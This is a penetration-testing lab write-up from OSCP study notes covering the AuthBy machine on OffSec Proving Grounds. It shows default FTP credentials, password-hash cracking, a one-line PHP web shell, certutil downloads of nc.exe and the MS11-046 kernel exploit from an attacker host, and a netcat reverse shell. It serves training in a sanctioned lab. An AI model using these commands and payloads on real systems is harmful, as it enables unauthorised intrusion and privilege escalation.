📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • FTP (Port 21)
  • HTTP (Port 242)
  • Exploit
  • Privesc

Was this helpful?

  1. Proving Grounds practice
  2. Get to work
  3. Windows

AuthBy

Writeup for AuthBy from offsec Proving Grounds

PreviousUT99NextJacko

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo ./nmapAutomator.sh 192.168.216.46 all

Service Enumeration

FTP (Port 21)

We see that there are a few accounts: Offsec, anonymous, and admin.

Looks like admin:admin gives us access to some files.

We can download any file we have access to using:

wget -m ftp://admin:admin@192.168.216.46

Looks like .htpasswd contains login credentials for offsec user account.

We use john here to crack it.

From here, we get offsec:elite for HTTP server on port 242.

HTTP (Port 242)

Exploit

We can transfer our shell.php which contains the following:

shell.php
<?php system($_GET['cmd']);?>

We then transfer nc.exe to the target machine.

http://192.168.216.46:242/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http://192.168.49.216/home/kali/pg/authby/payloads/nc.exe%20nc.exe

Now that we have nc.exe on the target machine, we can get our reverse shell.

nc.exe -e cmd.exe 192.168.49.216 80

Privesc

We can transfer winPEAS to the target machine and run it.

We can transfer the exploit to the target machine using the following command:

cmd.exe /c certutil -urlcache -split -f http://192.168.49.216/home/kali/pg/authby/windows-kernel-exploits/MS11-046/ms11-046.exe ms11-046.exe

We run the executable, and we get SYSTEM.

Logowindows-kernel-exploits/MS11-046 at master · SecWiki/windows-kernel-exploitsGitHub
LogoMicrosoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046)Exploit Database